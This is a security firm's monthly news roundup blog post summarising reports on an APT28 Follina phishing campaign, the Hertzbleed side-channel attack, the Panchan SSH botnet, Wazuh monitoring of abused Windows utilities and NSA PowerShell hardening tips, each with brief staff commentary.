This month’s news was about new attack methods and reanalyzing old claims that cryptographic keys are safe from attackers. This and more was on our mind and in the news this month. Read on for the articles our team has been discussing featuring new, old, and unorthodox techniques.
Phishing Campaign That Uses Nuclear War as Bait
This article mentions the phishing strategy of the notorious Russian cyber espionage group Fancy Bear a.k.a APT 28. The process involves using current events and a Microsoft bug, Follina, which was deemed a one-click exploit in May and is known to be linked to the Microsoft Support Diagnostic Tool. According to Threat Post, the bug affects current versions of Windows and Microsoft office products, making it especially dangerous.
In light of the recent events between Russia and Ukraine, Threat Post states that the campaign uses fear of potential nuclear warfare to get users to download the document. Once the user opens the document, the bug runs an embedded code within it; then, it retrieves an HTML file that allows for remote access.
“This latest tactic by the infamous APT group Fancy Bear highlights two important but basic facts when it comes to cybersecurity. Humans are still one of the weakest links in a security plan, by simply targeting users’ interests, fears, etc. Phishing attacks are successful. Organizations not only need to strengthen their email security (among other aspects of their architecture) but also their cybersecurity enablement/training program for employees so they are educated on such attacks. Also, regular vulnerability scanning and even more importantly patching are needed. Sadly, most Security and IT teams within an organization due to increased workload and reduced staff do not care for this important security measure in a timely and consistent manner.” — Shunta Sanders, Head of Solutions Architecture – North America
Source: Threat Post, June 23
Turning Power Side-Channel Attacks Into Remote Timing Attacks on x86
This article goes into detail and provides research on a new family of side-channel attacks. Hertzbleed is a technique where the variation of process timing allows attackers to retrieve cryptographic keys. Attackers can use this technique remotely and access the cryptographic keys. This side-channel attack affects everyone with a computer that uses an 86x style processor, including Intel and AMD processors.
The research also included experimental evidence and code used to create a mock environment and study the attack. The article talks about mitigating the attack, concluding that there are no exact solutions or ways to help. One way to mitigate such attacks is by disabling clock speed boosts; this is because when the clock speed changes, cryptographic keys are easier to extract.
“Following a long list of side-channel attacks discovered in the last years, such as Spectre and Meltdown, this attack shows once again that creating high performance and secure CPUs is a problem that has not been solved. Until it is, we will need to continue applying workarounds on top of our software to try to partially cover these holes, but I am unsure if this will continue to be sustainable in the future.” — Jon, Systems Programmer
Source: Hertzbleed Attack, June 14
Linux Botnet Has Found a Novel Way of Spreading
This post details how Akamai discovered a new Linux botnet, Panchan. This peer-to-peer transferred Linux botnet takes stolen SSH keys and spreads it throughout networks. This botnet used the Linux servers to mine cryptocurrency while protecting itself from detection. The botnet was written in the Go programming language, a language designed at Google. The article outlines reasons why this botnet has been so successful, including entering networks by accessing stolen SSH keys or lack of password security.
“Even if the attack is pretty simple, the fact that they are collecting and using stolen SSH certificates instead of using the good old dictionary attacks in an automated way is interesting.” — Fernando, Founder
Source: ZDNet, June 16
Monitoring Commonly Abused Windows Utilities
This article posted about Wazuh and their service that monitors commonly abused windows utilities. Wazuh’s service does forensic analysis to understand what is happening at the monitored endpoints and detect abuse by malicious actors. The article talks about system requirements to use their tool effectively, with detailed, step-by-step instructions on setting up the whole tool system to analyze and detect actors. They also demonstrate how to set up an alert system to be notified when real and potential threats are imminent. The article has handy images displaying the code and rules to help administrators better monitor their systems.
“In order to improve our intelligence and deception platform, one of the threat intelligence tasks is to track the evolution of threat actors: their procedures and techniques. One common activity is the use of legitimate software to hide or run malicious activities. You can find some examples of this activity and their corresponding MITRE Technique in this entry.” — Juan de la Fuente, Threat Intelligence Analyst
Source: Wazuh, June 9
NSA Shares Tips on Securing Windows Devices with PowerShell
NSA, America’s federal cybersecurity agency, shares a number of tips on how to use Windows PowerShell to add an extra layer of security to systems. Previously, system administrators believed that the Windows PowerShell helped out attackers more than it helped system administrators, often blocking it altogether. The NSA concludes that blocking PowerShell hinders defensive capabilities that current versions of PowerShell can provide, and prevents components of the Windows operating system from running properly, and encourages users to run updated versions of PowerShell with improved capabilities that can assist defenders in countering abuse of PowerShell.
The tips mentioned in this article require activation that can be done through PowerShell. These internal tools can help with external connections, keeping them more secure. Adding additional layers of security that come included with the operating system could help with budgeting and extra protection from potential attacks.
“Historically, PowerShell has caused a lot of headaches for system administrators as it gave attackers a lot of tools they can take advantage of. Nowadays, PowerShell is now much more mature, and it also provides great tools to assist defenders in countering abuse. Until now, defenders have typically disabled PowerShell in order to prevent attackers from abusing it, but, nowadays, doing so causes more harm than good. We all know that “unlearning” things (i.e., bad practices) are hard, but it’s worth it!” — Fernando, Founder
Source: BleepingComputer, June 22
Don’t miss next month’s roundup. Follow us on LinkedIn, Twitter, or sign up for our newsletter to stay in touch.